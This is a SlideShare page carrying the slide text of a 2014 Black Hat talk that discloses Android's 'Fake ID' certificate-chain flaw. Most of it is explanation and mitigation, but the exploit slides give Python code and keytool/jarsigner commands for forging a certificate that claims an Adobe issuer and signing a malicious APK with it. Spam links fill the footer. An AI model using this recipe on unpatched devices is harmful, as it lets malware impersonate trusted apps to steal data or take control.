SlideShare a Scribd company logo

Android Vulnerability: Fake ID

Blueboxer2014
Blueboxer2014

Every Android application has its own unique identity, typically inherited from the corporate developer’s identity. In July 2014, the Bluebox Security research team, Bluebox Labs, released the details of a new vulnerability discovered in Android, which allows these identities to be copied and used for nefarious purposes. Dubbed “Fake ID,” the vulnerability allows malicious applications to impersonate specially recognized trusted applications without any user notification. This can result in a wide spectrum of consequences. For example, the vulnerability can be used by malware to escape the normal application sandbox and take one or more malicious actions: insert a Trojan horse into an application by impersonating Adobe Systems; gain access to NFC financial and payment data by impersonating Google Wallet; or take full management control of the entire device by impersonating 3LM. This year at Black Hat USA, Jeff Forristal, CTO of Bluebox, presented on Fake ID. His presentation explains the technical details of how the vulnerability works. Watch a demo of the vulnerability here: http://offers.bluebox.com/resource-video-fakeID-recording.html?aliId=903578

Mobile
1 of 39
Download to read offline
AVnudlrnoeidra Fbailkitey ID Jeff Forristal / Bluebox BlackHat US 2014
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Jeff Forristal, CTO of Bluebox Security Discovered Android Masterkey vulnerability in 2013 Contributing to the security industry for 15+ years Masterkey
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 bug# 13678484 Security sandbox escape Usable by malware Allows data theft, device control All by presenting a fake signature identification A.k.a. the “Fake ID” vulnerability
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Application Identities / Signatures Jeff Forristal / Bluebox
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Android applications are signed The signature is the base of multiple security features Signatures
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 0101010101010 1010101010101 0101010101010 1010101010101 0101010101010 Subject: devel Issuer: devel Public key: 1010101010101 0101010101010 Opaque Signature Public Certificate PKCS7 Object Signatures *.SF Manifest *.MF Application APK Assets Manifest Classes.dex Resources XML File: hash File: hash File: hash File: hash File: hash File: hash File: hash File: hash File: hash File: hash Envelope CerFficate Signature Hierarchy
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: MySelf -­‐-­‐ BEGIN PUBLIC KEY -­‐-­‐-­‐ … Issuer: MySelf Issuer Signature: … crypto … -­‐-­‐ BEGIN PRIVATE KEY -­‐-­‐-­‐ … Subject: www.bluebox.com -­‐-­‐ BEGIN PUBLIC KEY -­‐-­‐-­‐ … Issuer: Verisign CA Issuer Signature: Certificates 101 … crypto … -­‐-­‐ BEGIN PRIVATE KEY -­‐-­‐-­‐ … Subject: Verisign CA -­‐-­‐ BEGIN PUBLIC KEY -­‐-­‐-­‐ … Issuer: … Issuer Signature: … -­‐-­‐ BEGIN PRIVATE KEY -­‐-­‐-­‐ …
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: client Public Key Issuer: SubCA1 Issuer Signature Public Key Issuer: SubCA2 Certificate Chaining Subject: SubCA1 Issuer Signature Subject: SubCA2 Public Key Issuer: CA Issuer Signature Subject: CA Public Key Issuer: CA Issuer Signature Immediate identity / signer Trusted root certificate Private Key
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: client Public Key Issuer: SubCA1 Issuer Signature Subject: SubCA1 Public Key Issuer: CA Issuer Signature Subject: CA Public Key Issuer: CA Issuer Signature Android On A Normal Day Subject: client Public Key Issuer: SubCA1 Issuer Signature Subject: SubCA1 Public Key Issuer: CA Issuer Signature Subject: CA Public Key Issuer: CA Issuer Signature
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Vulnerability Mechanics Jeff Forristal / Bluebox
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Applications attempt to verify the signing of other applications PackageInfo pkgInfo = pkgmgr.getPackageInfo( pkg, GET_SIGNATURES ) Signatures[] signatures = pkgInfo.signatures; for (Signature sig : signatures ) { if ( sig.equals( TRUSTED_SIGNATURE ) ) { // trusted signature found, trust the application } } Trust Checking
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: client Public Key Issuer: SubCA1 Issuer Signature PKI Chaining Subject: SubCA1 Public Key Issuer: SubCA2 Issuer Signature Subject: SubCA2 Public Key Issuer: CA Issuer Signature Subject: CA Public Key Issuer: CA Issuer Signature Trust? Trust? Trust?
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 The logic accepts one trusted certificate anywhere in signature /certificate chain Theory
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Reality
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Can we make a chain containing a chosen cert? Opportunity
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Chain Construction
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Chain Construction 1. Verify signature with signer cert 2. Create a chain based on valid signer cert 3. Get the cert’s issuer 4. Find an included cert where included cert subject == previous cert’s issuer 5. Add that cert to the chain
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: client Public Key Issuer: SubCA1 Issuer Signature Oops Subject: SubCA1 Public Key Issuer: SubCA2 Issuer Signature Subject: SubCA2 Public Key Issuer: CA Issuer Signature Subject: CA Public Key Issuer: CA Issuer Signature ? ? ? A certificate can claim to be issued by any other certificate … … and that claim is not verified
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 This code can now be easily attacked / bypassed PackageInfo pkgInfo = pkgmgr.getPackageInfo( pkg, GET_SIGNATURES ) Signatures[] signatures = pkgInfo.signatures; for (Signature sig : signatures ) { if ( sig.equals( TRUSTED_SIGNATURE ) ) { // trusted signature found, trust the application } } Impact
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: AWacker Public Key Issuer: AWacker Issuer Signature Fabrication Subject: TrustedCert Public Key Issuer: … Issuer Signature Private Key No private key! Public cert only!
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: AWacker Public Key Issuer: TrustedCert Issuer Signature Fabrication Subject: TrustedCert Public Key Issuer: … Issuer Signature Private Key
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: AWacker Public Key Issuer: TrustedCert Issuer Signature Result Subject: TrustedCert Public Key Issuer: … Issuer Signature Trust? Trust?
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Exploitation Jeff Forristal / Bluebox
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Review all uses of signatures in AOSP Targets Further review of select third-party components involving extra privileges
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Webview plugin manager (all AOSP <= 4.3) • Plugins signed by Adobe (Flash) reloaded into any/all apps using framework webview NFC access.xml (all AOSP) • Match a package signature wildcard (Google Wallet), get access to NFC secure element 3LM device management extensions (assorted devices) • Former Google/Motorola technology, included with older devices There will be others identities/vectors… • It’s a general purpose problem Targets - Examples
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Subject: trusted_cert Public Key Issuer: … Issuer Signature 1. Create APK with exploit payload suitable for target 2. Isolate trusted certificate 3. Generate a new certificate 4. Set issuer to trusted certificate 5. Package all of it (new cert + target cert as a CA cert) into a PKCS12 file 6. Use the PKCS12 for exploit APK signing Subject: AWacker Issuer: trusted_cert Issuer Signature (broken) Public Key targetcert = OpenSSL.crypto.load_certificate( target ) pk = OpenSSL.crypto.PKey() pk.generate_key( OpenSSL.crypto.TYPE_RSA, 1024) newcert = OpenSSL.crypto.X509() newcert.get_subject().CN = “arbitrary” newcert.set_issuer( targetcert.get_subject() ) newcert.set_pubkey( pk ) newcert.sign( pk, “sha1” ) pkcs12 = OpenSSL.crypto.PKCS12() pkcs12.set_privatekey( pk ) pkcs12.set_certificate( cert ) pkcs12.set_ca_certificates( [targetcert] ) finalPkcs12Data = pkcs12.export( passphrase=“1234” ) Exploit Creation
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 jeff$ openssl x509 -­‐in webkit_plugin.pem -­‐noout -­‐text | grep Subject: Subject: C=US, ST=California, L=San Jose, O=Adobe Systems Incorporated, OU=… jeff$ python newcert.py webkit_plugin.pem jeff$ openssl x509 -­‐in out.cert -­‐noout -­‐text CerFficate: Data: Version: 1 (0x0) Serial Number: 976234562 (0x3a302842) Signature Algorithm: sha1WithRSAEncrypFon Issuer: C=US, ST=California, L=San Jose, O=Adobe Systems Incorporated, OU=… Validity Not Before: Jun 30 23:44:40 2014 GMT Not Aker : Jun 25 23:44:40 2034 GMT Subject: CN=labs.bluebox.com Subject Public Key Info: Public Key Algorithm: rsaEncrypFon RSA Public Key: (1024 bit) Modulus (1024 bit): 00:b4:df:2d:53:9a:f2:8f:61:99:bc:56:19:57:76: … Crafting
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 jeff$ keytool -­‐v -­‐importkeystore -­‐srckeystore out.pkcs12 -­‐srcstoretype PKCS12 -­‐destkeystore evil.keystore -­‐deststoretype JKS Enter desFnaFon keystore password: Re-­‐enter new password: Enter source keystore password: Entry for alias 1 successfully imported. Import command completed: 1 entries successfully imported, 0 entries failed or cancelled [Storing evil.keystore] Crafting
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 jeff$ jarsigner -­‐verbose -­‐sigalg SHA1withRSA -­‐digestalg SHA1 -­‐keystore evil.keystore Bluebox_SampleWebkitPlugin.apk 1 Enter Passphrase for keystore: Enter key password for 1: adding: META-­‐INF/MANIFEST.MF adding: META-­‐INF/1.SF adding: META-­‐INF/1.RSA signing: AndroidManifest.xml signing: classes.dex signing: lib/armeabi-­‐v7a/libsampleplugin3.so signing: res/drawable-­‐mdpi/ic_launcher.png signing: res/drawable-­‐mdpi/sample_browser_plugin.png signing: res/layout/acFvity_main.xml signing: res/menu/main.xml signing: resources.arsc Crafting
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 jeff$ adb install Bluebox_SampleWebkitPlugin.apk 1165 KB/s (39864 bytes in 0.033s) pkg: /data/local/tmp/Bluebox_SampleWebkitPlugin.apk Success I/PackageManager( 433): Running dexopt on: com.bluebox.labs.chainbreak.demo D/dalvikvm(11123): DexOpt: load 23ms, verify+opt 6ms, 282884 bytes I/AcFvityManager( 433): Force stopping package com.bluebox.labs.chainbreak.demo appid=10083 user=-­‐1 W/PackageManager( 433): Unknown permission android.webkit.permission.PLUGIN in package com.bluebox.labs.chainbreak.demo I/Plugin ( 8109): Bluebox running code in this process! I/Plugin ( 8109): -­‐-­‐ uid=10077, pid=8109, process=com.microsok.skydrive I/Plugin ( 5158): Bluebox running code in this process! I/Plugin ( 5158): -­‐-­‐ uid=10054, pid=5158, process=com.google.android.googlequicksearchbox:search I/Plugin (10166): Bluebox running code in this process! I/Plugin (10166): -­‐-­‐ uid=10081, pid=10166, process=com.salesforce.chaWer Fingers Crossed
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Live Demo Jeff Forristal / Bluebox
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Battle Plan App App App App Evil App plugin.so Evil .so Externally: (Fake) Google Services Update app Internally: Malicious webkit plugin Signed w/ Adobe cert in cert chain
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Battle Plan App App App App Evil App plugin.so Evil .so .so .so .so .so
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Battle Plan Command & Control Server App App App App Evil App plugin.so Evil .so .so .so .so .so
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Mitigation Jeff Forristal / Bluebox
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Patched, sent to OHA partners – get your OTAs in the usual manner (if ever) BTW, released to public repo May 21st Patches
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Bluebox Security Scanner (free) Jeff Forristal / Bluebox
FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14 Stick to known sources for your applications Android 4.4 (KitKat) + is immune to Flash webkit plugin (KitKat replaced webkit webview with chromium) Check your (older) device for 3LM extensions (adb shell getprop | grep ro.3lm.production) Beware of who asks for Device Admin access (Settings -> Security -> Device Administrators) Hygiene
Thanks jeff@bluebox.com http://bluebox.com/blog

Recommended

U2F/FIDO2 implementation of YubiKey
U2F/FIDO2 implementation of YubiKeyU2F/FIDO2 implementation of YubiKey
U2F/FIDO2 implementation of YubiKeyHaniyama Wataru
 
[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...
[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...
[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...CODE BLUE
 
WebAuthn and Security Keys
WebAuthn and Security KeysWebAuthn and Security Keys
WebAuthn and Security KeysFIDO Alliance
 
Technical Considerations for Deploying FIDO Authentication
Technical Considerations for Deploying FIDO Authentication Technical Considerations for Deploying FIDO Authentication
Technical Considerations for Deploying FIDO Authentication FIDO Alliance
 
FIDO Certification
FIDO CertificationFIDO Certification
FIDO CertificationFIDO Alliance
 
Introducing Intelligence Into Your Malware Analysis
Introducing Intelligence Into Your Malware AnalysisIntroducing Intelligence Into Your Malware Analysis
Introducing Intelligence Into Your Malware AnalysisBrian Baskin
 
Sign in with Apple
Sign in with Apple Sign in with Apple
Sign in with Apple Nov Matake
 
JavaScriptを使って学ぶEnd-to-Endセキュリティ Appendix
JavaScriptを使って学ぶEnd-to-Endセキュリティ AppendixJavaScriptを使って学ぶEnd-to-Endセキュリティ Appendix
JavaScriptを使って学ぶEnd-to-Endセキュリティ AppendixJun Kurihara
 

Recommended

U2F/FIDO2 implementation of YubiKey
U2F/FIDO2 implementation of YubiKeyU2F/FIDO2 implementation of YubiKey
U2F/FIDO2 implementation of YubiKeyHaniyama Wataru
 
[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...
[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...
[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...CODE BLUE
 
WebAuthn and Security Keys
WebAuthn and Security KeysWebAuthn and Security Keys
WebAuthn and Security KeysFIDO Alliance
 
Technical Considerations for Deploying FIDO Authentication
Technical Considerations for Deploying FIDO Authentication Technical Considerations for Deploying FIDO Authentication
Technical Considerations for Deploying FIDO Authentication FIDO Alliance
 
FIDO Certification
FIDO CertificationFIDO Certification
FIDO CertificationFIDO Alliance
 
Introducing Intelligence Into Your Malware Analysis
Introducing Intelligence Into Your Malware AnalysisIntroducing Intelligence Into Your Malware Analysis
Introducing Intelligence Into Your Malware AnalysisBrian Baskin
 
Sign in with Apple
Sign in with Apple Sign in with Apple
Sign in with Apple Nov Matake
 
JavaScriptを使って学ぶEnd-to-Endセキュリティ Appendix
JavaScriptを使って学ぶEnd-to-Endセキュリティ AppendixJavaScriptを使って学ぶEnd-to-Endセキュリティ Appendix
JavaScriptを使って学ぶEnd-to-Endセキュリティ AppendixJun Kurihara
 
200:1 - Do You Trust Your Mobile Security Odds?
200:1 - Do You Trust Your Mobile Security Odds? 200:1 - Do You Trust Your Mobile Security Odds?
200:1 - Do You Trust Your Mobile Security Odds? Blueboxer2014
 
Hooters Calendar 2011
Hooters Calendar 2011Hooters Calendar 2011
Hooters Calendar 2011montanabrowne
 
Presentación animada short idioms
Presentación animada short idiomsPresentación animada short idioms
Presentación animada short idiomsbegogema
 
There Was Nothing Born On Earth
There Was Nothing Born On EarthThere Was Nothing Born On Earth
There Was Nothing Born On EarthNikhil Parekh
 
Flyer rn225
Flyer rn225Flyer rn225
Flyer rn225lapostat
 
فرص اغلى من الذهب
فرص اغلى من الذهبفرص اغلى من الذهب
فرص اغلى من الذهبislamtics default
 
The New Hooters Calendar!
The New Hooters Calendar!The New Hooters Calendar!
The New Hooters Calendar!montanabrowne
 
The Rules of Mating & Dating
The Rules of Mating & DatingThe Rules of Mating & Dating
The Rules of Mating & DatingTroy Simmonds
 
Nice Wordings
Nice WordingsNice Wordings
Nice Wordingsislamtics default
 
Home made energy
Home made energyHome made energy
Home made energyachieveyourgoal
 
14 jack h. mendelson - 5075341 - treatment for cocaine abuse
14 jack h. mendelson - 5075341 - treatment for cocaine abuse14 jack h. mendelson - 5075341 - treatment for cocaine abuse
14 jack h. mendelson - 5075341 - treatment for cocaine abuseMello_Patent_Registry
 
بروتوكلات صهيون
بروتوكلات صهيونبروتوكلات صهيون
بروتوكلات صهيونislamtics default
 
Instruction Manual Minelab Sovereign Metal Detector English Language
Instruction Manual Minelab Sovereign Metal Detector English LanguageInstruction Manual Minelab Sovereign Metal Detector English Language
Instruction Manual Minelab Sovereign Metal Detector English LanguageSerious Detecting
 
Presentation cocaine abuse
Presentation cocaine abusePresentation cocaine abuse
Presentation cocaine abusesharitabarnhill
 
Future Commerce - 8 trends that are changing how we buy and sell online
Future Commerce - 8 trends that are changing how we buy and sell onlineFuture Commerce - 8 trends that are changing how we buy and sell online
Future Commerce - 8 trends that are changing how we buy and sell onlineFadi Shuman
 
The Wife Of Bath
The Wife Of BathThe Wife Of Bath
The Wife Of BathMichael Rua
 
Structural Consultancy in India
Structural Consultancy in IndiaStructural Consultancy in India
Structural Consultancy in IndiaNMRD Ltd
 
Arabian nights report
Arabian nights reportArabian nights report
Arabian nights reportKyoko Murillo
 
The Mexican Fisherman
The Mexican FishermanThe Mexican Fisherman
The Mexican Fishermanyolyordam yolyordam
 
Audience And Institutions Revision Pack
Audience And Institutions Revision PackAudience And Institutions Revision Pack
Audience And Institutions Revision PackBelinda Raji
 
FRIDA 101 Android
FRIDA 101 AndroidFRIDA 101 Android
FRIDA 101 AndroidTony Thomas
 
Fast IDentity Online New wave of open authentication standards
Fast IDentity Online New wave of open authentication standardsFast IDentity Online New wave of open authentication standards
Fast IDentity Online New wave of open authentication standards.NET Crowd
 

More Related Content

Viewers also liked

200:1 - Do You Trust Your Mobile Security Odds?
200:1 - Do You Trust Your Mobile Security Odds? 200:1 - Do You Trust Your Mobile Security Odds?
200:1 - Do You Trust Your Mobile Security Odds? Blueboxer2014
 
Hooters Calendar 2011
Hooters Calendar 2011Hooters Calendar 2011
Hooters Calendar 2011montanabrowne
 
Presentación animada short idioms
Presentación animada short idiomsPresentación animada short idioms
Presentación animada short idiomsbegogema
 
There Was Nothing Born On Earth
There Was Nothing Born On EarthThere Was Nothing Born On Earth
There Was Nothing Born On EarthNikhil Parekh
 
Flyer rn225
Flyer rn225Flyer rn225
Flyer rn225lapostat
 
فرص اغلى من الذهب
فرص اغلى من الذهبفرص اغلى من الذهب
فرص اغلى من الذهبislamtics default
 
The New Hooters Calendar!
The New Hooters Calendar!The New Hooters Calendar!
The New Hooters Calendar!montanabrowne
 
The Rules of Mating & Dating
The Rules of Mating & DatingThe Rules of Mating & Dating
The Rules of Mating & DatingTroy Simmonds
 
14 jack h. mendelson - 5075341 - treatment for cocaine abuse
14 jack h. mendelson - 5075341 - treatment for cocaine abuse14 jack h. mendelson - 5075341 - treatment for cocaine abuse
14 jack h. mendelson - 5075341 - treatment for cocaine abuseMello_Patent_Registry
 
بروتوكلات صهيون
بروتوكلات صهيونبروتوكلات صهيون
بروتوكلات صهيونislamtics default
 
Instruction Manual Minelab Sovereign Metal Detector English Language
Instruction Manual Minelab Sovereign Metal Detector English LanguageInstruction Manual Minelab Sovereign Metal Detector English Language
Instruction Manual Minelab Sovereign Metal Detector English LanguageSerious Detecting
 
Presentation cocaine abuse
Presentation cocaine abusePresentation cocaine abuse
Presentation cocaine abusesharitabarnhill
 
Future Commerce - 8 trends that are changing how we buy and sell online
Future Commerce - 8 trends that are changing how we buy and sell onlineFuture Commerce - 8 trends that are changing how we buy and sell online
Future Commerce - 8 trends that are changing how we buy and sell onlineFadi Shuman
 
The Wife Of Bath
The Wife Of BathThe Wife Of Bath
The Wife Of BathMichael Rua
 
Structural Consultancy in India
Structural Consultancy in IndiaStructural Consultancy in India
Structural Consultancy in IndiaNMRD Ltd
 
Arabian nights report
Arabian nights reportArabian nights report
Arabian nights reportKyoko Murillo
 
Audience And Institutions Revision Pack
Audience And Institutions Revision PackAudience And Institutions Revision Pack
Audience And Institutions Revision PackBelinda Raji
 

Viewers also liked (20)

200:1 - Do You Trust Your Mobile Security Odds?
200:1 - Do You Trust Your Mobile Security Odds? 200:1 - Do You Trust Your Mobile Security Odds?
200:1 - Do You Trust Your Mobile Security Odds?
 
Hooters Calendar 2011
Hooters Calendar 2011Hooters Calendar 2011
Hooters Calendar 2011
 
Presentación animada short idioms
Presentación animada short idiomsPresentación animada short idioms
Presentación animada short idioms
 
There Was Nothing Born On Earth
There Was Nothing Born On EarthThere Was Nothing Born On Earth
There Was Nothing Born On Earth
 
Flyer rn225
Flyer rn225Flyer rn225
Flyer rn225
 
فرص اغلى من الذهب
فرص اغلى من الذهبفرص اغلى من الذهب
فرص اغلى من الذهب
 
The New Hooters Calendar!
The New Hooters Calendar!The New Hooters Calendar!
The New Hooters Calendar!
 
The Rules of Mating & Dating
The Rules of Mating & DatingThe Rules of Mating & Dating
The Rules of Mating & Dating
 
Nice Wordings
Nice WordingsNice Wordings
Nice Wordings
 
Home made energy
Home made energyHome made energy
Home made energy
 
14 jack h. mendelson - 5075341 - treatment for cocaine abuse
14 jack h. mendelson - 5075341 - treatment for cocaine abuse14 jack h. mendelson - 5075341 - treatment for cocaine abuse
14 jack h. mendelson - 5075341 - treatment for cocaine abuse
 
بروتوكلات صهيون
بروتوكلات صهيونبروتوكلات صهيون
بروتوكلات صهيون
 
Instruction Manual Minelab Sovereign Metal Detector English Language
Instruction Manual Minelab Sovereign Metal Detector English LanguageInstruction Manual Minelab Sovereign Metal Detector English Language
Instruction Manual Minelab Sovereign Metal Detector English Language
 
Presentation cocaine abuse
Presentation cocaine abusePresentation cocaine abuse
Presentation cocaine abuse
 
Future Commerce - 8 trends that are changing how we buy and sell online
Future Commerce - 8 trends that are changing how we buy and sell onlineFuture Commerce - 8 trends that are changing how we buy and sell online
Future Commerce - 8 trends that are changing how we buy and sell online
 
The Wife Of Bath
The Wife Of BathThe Wife Of Bath
The Wife Of Bath
 
Structural Consultancy in India
Structural Consultancy in IndiaStructural Consultancy in India
Structural Consultancy in India
 
Arabian nights report
Arabian nights reportArabian nights report
Arabian nights report
 
The Mexican Fisherman
The Mexican FishermanThe Mexican Fisherman
The Mexican Fisherman
 
Audience And Institutions Revision Pack
Audience And Institutions Revision PackAudience And Institutions Revision Pack
Audience And Institutions Revision Pack
 

Similar to Android Vulnerability: Fake ID

FRIDA 101 Android
FRIDA 101 AndroidFRIDA 101 Android
FRIDA 101 AndroidTony Thomas
 
Fast IDentity Online New wave of open authentication standards
Fast IDentity Online New wave of open authentication standardsFast IDentity Online New wave of open authentication standards
Fast IDentity Online New wave of open authentication standards.NET Crowd
 
FIDO-U2F-Case-Study_Hanson.pptx
FIDO-U2F-Case-Study_Hanson.pptxFIDO-U2F-Case-Study_Hanson.pptx
FIDO-U2F-Case-Study_Hanson.pptxVladVlad504281
 
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)CloudIDSummit
 
Android Hacking
Android HackingAndroid Hacking
Android Hackingantitree
 
Manish Chasta - Securing Android Applications
Manish Chasta - Securing Android ApplicationsManish Chasta - Securing Android Applications
Manish Chasta - Securing Android ApplicationsPositive Hack Days
 
Ehternet Security "Unplugged" .pptx
Ehternet Security "Unplugged" .pptxEhternet Security "Unplugged" .pptx
Ehternet Security "Unplugged" .pptxTony Lauro
 
Apache Milagro Presentation at ApacheCon Europe 2016
Apache Milagro Presentation at ApacheCon Europe 2016Apache Milagro Presentation at ApacheCon Europe 2016
Apache Milagro Presentation at ApacheCon Europe 2016Brian Spector
 
U2F Case Study: Examining the U2F Paradox
U2F Case Study: Examining the U2F ParadoxU2F Case Study: Examining the U2F Paradox
U2F Case Study: Examining the U2F ParadoxFIDO Alliance
 
DEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summer
DEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summerDEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summer
DEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summerFelipe Prado
 
Decompiling Android Workshop
Decompiling Android WorkshopDecompiling Android Workshop
Decompiling Android WorkshopGodfrey Nolan
 
Security PWNing 2018 - Penthertz: The use of radio attacks during redteam tests
Security PWNing 2018 - Penthertz: The use of radio attacks during redteam testsSecurity PWNing 2018 - Penthertz: The use of radio attacks during redteam tests
Security PWNing 2018 - Penthertz: The use of radio attacks during redteam tests📡 Sebastien Dudek
 
Situational Awareness, Botnet and Malware Detection in the Modern Era - Davi...
Situational Awareness, Botnet and Malware Detection in the Modern Era - Davi...Situational Awareness, Botnet and Malware Detection in the Modern Era - Davi...
Situational Awareness, Botnet and Malware Detection in the Modern Era - Davi...Codemotion
 
iot hacking, smartlockpick
iot hacking, smartlockpick iot hacking, smartlockpick
iot hacking, smartlockpickidsecconf
 
NTXISSACSC3 - Manage Mobile Security Incidents like A Boss by Ismail Guneydas
NTXISSACSC3 - Manage Mobile Security Incidents like A Boss by Ismail Guneydas NTXISSACSC3 - Manage Mobile Security Incidents like A Boss by Ismail Guneydas
NTXISSACSC3 - Manage Mobile Security Incidents like A Boss by Ismail Guneydas North Texas Chapter of the ISSA
 
FIDO Specifications Overview: UAF & U2F
FIDO Specifications Overview: UAF & U2FFIDO Specifications Overview: UAF & U2F
FIDO Specifications Overview: UAF & U2FFIDO Alliance
 
PRO TALK - Kubernetes Security Workshop.pdf
PRO TALK - Kubernetes Security Workshop.pdfPRO TALK - Kubernetes Security Workshop.pdf
PRO TALK - Kubernetes Security Workshop.pdfAvinashDesireddy
 
Kubernetes Security Workshop
Kubernetes Security WorkshopKubernetes Security Workshop
Kubernetes Security WorkshopMirantis
 

Similar to Android Vulnerability: Fake ID (20)

FRIDA 101 Android
FRIDA 101 AndroidFRIDA 101 Android
FRIDA 101 Android
 
Fast IDentity Online New wave of open authentication standards
Fast IDentity Online New wave of open authentication standardsFast IDentity Online New wave of open authentication standards
Fast IDentity Online New wave of open authentication standards
 
FIDO-U2F-Case-Study_Hanson.pptx
FIDO-U2F-Case-Study_Hanson.pptxFIDO-U2F-Case-Study_Hanson.pptx
FIDO-U2F-Case-Study_Hanson.pptx
 
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
 
Android Hacking
Android HackingAndroid Hacking
Android Hacking
 
News bytes Sept-2011
News bytes Sept-2011News bytes Sept-2011
News bytes Sept-2011
 
Manish Chasta - Securing Android Applications
Manish Chasta - Securing Android ApplicationsManish Chasta - Securing Android Applications
Manish Chasta - Securing Android Applications
 
Ehternet Security "Unplugged" .pptx
Ehternet Security "Unplugged" .pptxEhternet Security "Unplugged" .pptx
Ehternet Security "Unplugged" .pptx
 
Apache Milagro Presentation at ApacheCon Europe 2016
Apache Milagro Presentation at ApacheCon Europe 2016Apache Milagro Presentation at ApacheCon Europe 2016
Apache Milagro Presentation at ApacheCon Europe 2016
 
U2F Case Study: Examining the U2F Paradox
U2F Case Study: Examining the U2F ParadoxU2F Case Study: Examining the U2F Paradox
U2F Case Study: Examining the U2F Paradox
 
DEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summer
DEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summerDEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summer
DEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summer
 
Decompiling Android Workshop
Decompiling Android WorkshopDecompiling Android Workshop
Decompiling Android Workshop
 
Security PWNing 2018 - Penthertz: The use of radio attacks during redteam tests
Security PWNing 2018 - Penthertz: The use of radio attacks during redteam testsSecurity PWNing 2018 - Penthertz: The use of radio attacks during redteam tests
Security PWNing 2018 - Penthertz: The use of radio attacks during redteam tests
 
Situational Awareness, Botnet and Malware Detection in the Modern Era - Davi...
Situational Awareness, Botnet and Malware Detection in the Modern Era - Davi...Situational Awareness, Botnet and Malware Detection in the Modern Era - Davi...
Situational Awareness, Botnet and Malware Detection in the Modern Era - Davi...
 
Securing android applications
Securing android applicationsSecuring android applications
Securing android applications
 
iot hacking, smartlockpick
iot hacking, smartlockpick iot hacking, smartlockpick
iot hacking, smartlockpick
 
NTXISSACSC3 - Manage Mobile Security Incidents like A Boss by Ismail Guneydas
NTXISSACSC3 - Manage Mobile Security Incidents like A Boss by Ismail Guneydas NTXISSACSC3 - Manage Mobile Security Incidents like A Boss by Ismail Guneydas
NTXISSACSC3 - Manage Mobile Security Incidents like A Boss by Ismail Guneydas
 
FIDO Specifications Overview: UAF & U2F
FIDO Specifications Overview: UAF & U2FFIDO Specifications Overview: UAF & U2F
FIDO Specifications Overview: UAF & U2F
 
PRO TALK - Kubernetes Security Workshop.pdf
PRO TALK - Kubernetes Security Workshop.pdfPRO TALK - Kubernetes Security Workshop.pdf
PRO TALK - Kubernetes Security Workshop.pdf
 
Kubernetes Security Workshop
Kubernetes Security WorkshopKubernetes Security Workshop
Kubernetes Security Workshop
 

Recently uploaded

Model Call Girl in Shalimar Bagh Delhi reach out to us at 🔝8264348440🔝
Model Call Girl in Shalimar Bagh Delhi reach out to us at 🔝8264348440🔝Model Call Girl in Shalimar Bagh Delhi reach out to us at 🔝8264348440🔝
Model Call Girl in Shalimar Bagh Delhi reach out to us at 🔝8264348440🔝soniya singh
 
CALL ON ➥8923113531 🔝Call Girls Gomti Nagar Lucknow best Night Fun service
